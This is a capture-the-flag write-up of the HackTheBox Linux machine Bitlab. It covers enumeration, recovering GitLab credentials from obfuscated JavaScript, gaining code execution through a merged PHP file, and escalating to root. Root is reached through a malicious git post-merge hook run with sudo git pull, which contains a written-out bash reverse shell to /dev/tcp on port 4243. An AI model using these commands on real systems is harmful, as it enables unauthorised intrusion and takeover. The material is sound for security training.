Bitlab - Medium Box running on Linux. GitLab // x32dbg // Debugging / PostGre // git pull // JavaScript
ENUMERATION
NMAP
So,… let’s first start NMAP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 10.10.10.114
Host is up (0.087s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-title: GitLab is not responding (502)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 is only interesting port to continue enumerating
GOBUSTER
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
luka@kali:~/htb/bitlab$ gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -k -s 200,204,301,307,401,403
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.114
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
===============================================================
/help (Status: 301)
/profile (Status: 301)
/search (Status: 200)
/public (Status: 200)
/root (Status: 200)
Progress: 2541 / 87
Checking Webserver manually
So there to be a bookmark html file that seems like a leak
.png)
EXPLOITATION
JS Deobfuscation
“Gitlab Login” seems to store credentials for Gitlab but the script is obfuscation. Just throwing it into jsnice.org (can be done manually as well!) reveals the password.
.png)
Credentials work for Gitlab on Port 80
GitLab Missconfiguration
After checking both repositories on GitLab after logging in it seems that “Deployer” repository does few things including sudo git pull.
.png)
Some IFs have to be met though so let’s do that.
Let’s go to Profile repo and create new master branch.
.png)
Add new File to it
.png)
Put code inside (PHP)
.png)
Create merge request next, request merge and merge without making any changes.
If everything has been done correctly you should see something like this:
.png)
And file is also in its place
.png)
…. and remote execution works
.png)
Swap that with reverse shell:
.png)
And shell was popped:
.png)
There are two privilege escalation possibilities. One is exploiting that sudo git pull, other one is finishing code found in snippets in GitLab to get clave users credentials.
PRIVILEGE ESCALATION
PrivEsc#1: Git pull may be run as sudo
Let’s first start with “sudo git pull”
I used post-merge hook since that was only one working - pre-commit didn’t work. I didn’t dig deeper to see if pre-commit gets executed or not though.
NOTE: since we need to copy whole repository to somewhere where we have write access to, we need to make a change in the repository otherwise pull wont work. So just create a single file like below:
.png)
Copy the repostiory to /tmp and create a weaponized post-merge hook.
1
2
3
4
5
6
7
cp -r /var/www/html/profile/ /tmp/
echo '#!/bin/bash' > /tmp/profile/.git/hooks/post-merge
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.10/4243 0>&1"' >> /tmp/profile/.git/hooks/post-merge
chmod +x /tmp/profile/.git/hooks/post-merge
sudo /usr/bin/git pull
Root:
.png)
PrivEsc#2: PostGRE
Snippet can be found in GitLab in snippets menu.
.png)
Code is just missing a line which prints the results.
.png)
Password with username was retrieved
.png)
After SSHing onto the box with clave, there is file called “RemoteConnection.exe” in the clave’s home directory. I pulled that file to windows and used it with x32dbg. (didn’t work ghidra, or dnspy 64 bit!)
PrivEsc#2: x32dbg (retrieving password from the stack)
File will put root’s password onto the stack at some point.
.png)
It works with SSH, i didn’t try to run the file directly :)